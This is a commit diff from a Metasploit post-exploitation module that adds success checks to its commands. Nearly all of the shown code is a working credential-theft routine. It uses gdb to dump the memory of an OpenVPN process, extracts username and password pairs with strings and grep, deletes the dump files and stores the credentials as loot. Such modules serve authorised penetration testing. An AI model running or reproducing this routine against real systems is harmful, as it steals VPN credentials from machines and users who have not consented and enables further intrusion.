Added check if the commands executed successfully.
parent
0bce90654f
commit
a48d0b275b
|
@ -57,15 +57,24 @@ class Metasploit4 < Msf::Post
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
cmd_exec('/bin/grep rw-p /proc/'"#{pid}"'/maps | sed -n \'s/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p\' | while read start stop; do /usr/bin/gdb --batch-silent --silent --pid '"#{pid}"' -ex "dump memory '"#{tmp_path}#{pid}"'-$start-$stop.dump 0x$start 0x$stop"; done')
|
dump = cmd_exec('/bin/grep rw-p /proc/'"#{pid}"'/maps | sed -n \'s/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p\' | while read start stop; do /usr/bin/gdb --batch-silent --silent --pid '"#{pid}"' -ex "dump memory '"#{tmp_path}#{pid}"'-$start-$stop.dump 0x$start 0x$stop"; done 2>/dev/null; echo $?')
|
||||||
strings = cmd_exec("/usr/bin/strings #{tmp_path}*.dump | /bin/grep -B2 KnOQ | /bin/grep -v KnOQ | /usr/bin/column | /usr/bin/awk '{print \"User: \"$1\"\\nPass: \"$2}'")
|
if dump.chomp.to_i == 0
|
||||||
cmd_exec("/bin/rm #{tmp_path}*.dump --force")
|
vprint_good('Succesfully dump.')
|
||||||
|
else
|
||||||
if strings.empty?
|
print_warning('Could not dump process.')
|
||||||
print_error('No credentials. You can check if the PID is correct.')
|
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
strings = cmd_exec("/usr/bin/strings #{tmp_path}*.dump | /bin/grep -B2 KnOQ | /bin/grep -v KnOQ | /usr/bin/column | /usr/bin/awk '{print \"User: \"$1\"\\nPass: \"$2}'")
|
||||||
|
|
||||||
|
deldump = cmd_exec("/bin/rm #{tmp_path}*.dump --force 2>/dev/null; echo $?")
|
||||||
|
if deldump.chomp.to_i == 0
|
||||||
|
vprint_good('Removing temp files successfully.')
|
||||||
|
else
|
||||||
|
print_warning('Could not remove dumped files.')
|
||||||
|
end
|
||||||
|
|
||||||
|
fail_with(Failure::BadConfig, 'No credentials. You can check if the PID is correct.') if strings.empty?
|
||||||
|
|
||||||
vprint_good("OpenVPN Credentials:\n#{strings}")
|
vprint_good("OpenVPN Credentials:\n#{strings}")
|
||||||
|
|
||||||
p = store_loot(
|
p = store_loot(
|
||||||
|
|
Loading…
Reference in New Issue